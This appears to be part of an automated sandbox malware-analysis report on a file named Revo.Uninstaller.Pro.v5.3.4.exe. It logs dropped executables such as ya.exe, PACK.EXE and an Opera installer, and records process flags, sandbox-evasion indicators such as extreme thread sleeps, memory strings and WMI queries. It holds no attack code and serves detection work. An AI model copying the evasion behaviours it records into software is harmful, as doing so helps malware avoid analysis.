        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\grpconv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe | Process information set: NOOPENFILEERRORBOX (this event is recorded 5 times for ya.exe in the report)

        Malware Analysis System Evasion

        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.2D540419E-F4B7-47F9-B045-3539873E2AB75.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.218F02B1E-9ABE-4B3F-B347-A65E945826B76.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Window / User API: threadDelayed 2161
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7337
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2166
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6561
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3093
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6657
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3056
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\INetC.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsDialogs.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Opera_115.0.5322.77_Autoupdate_x64[1].exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\LangDLL.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sys
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640052497196.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\System.dll
        Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Windows\System32\drivers\SETE8C2.tmp
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640027403532.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640030686032.dll
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640048718040.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sys
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\INetC.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)
        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091640042418092.dll
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091140041\opera_package
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exe
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf916D.tmp\nsExec.dll
        Source: C:\Windows\System32\rundll32.exe Dropped PE file which has not been started: C:\Windows\system32\DRIVERS\revoflt.sys (copy)
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf82A3.tmp\System.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe TID: 2368 Thread sleep time: -108050s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2188 Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120 Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep count: 6657 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep count: 3056 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1376 Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File Volume queried: C:\Program Files FullSizeInformation
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe File Volume queried: C:\Users\user\AppData\Local\Temp\7zS49240581 FullSizeInformation
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_00402930 FindFirstFileW, 0_2_00402930
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_004069FF FindFirstFileW,FindClose, 0_2_004069FF
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe Code function: 0_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_002EA2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 16_2_002EA2DF
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_002FAFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 16_2_002FAFB9
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_00309FD3 FindFirstFileExA, 16_2_00309FD3
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Code function: 27_2_004069FF FindFirstFileW,FindClose, 27_2_004069FF
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Code function: 27_2_00405DAE CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 27_2_00405DAE
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe Code function: 27_2_00402930 FindFirstFileW, 27_2_00402930
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXE Code function: 16_2_002FD353 VirtualQuery,GetSystemInfo, 16_2_002FD353
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\OpenSSL32.DllA\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl32.DllA\
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe File opened: C:\Program Files (x86)\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\
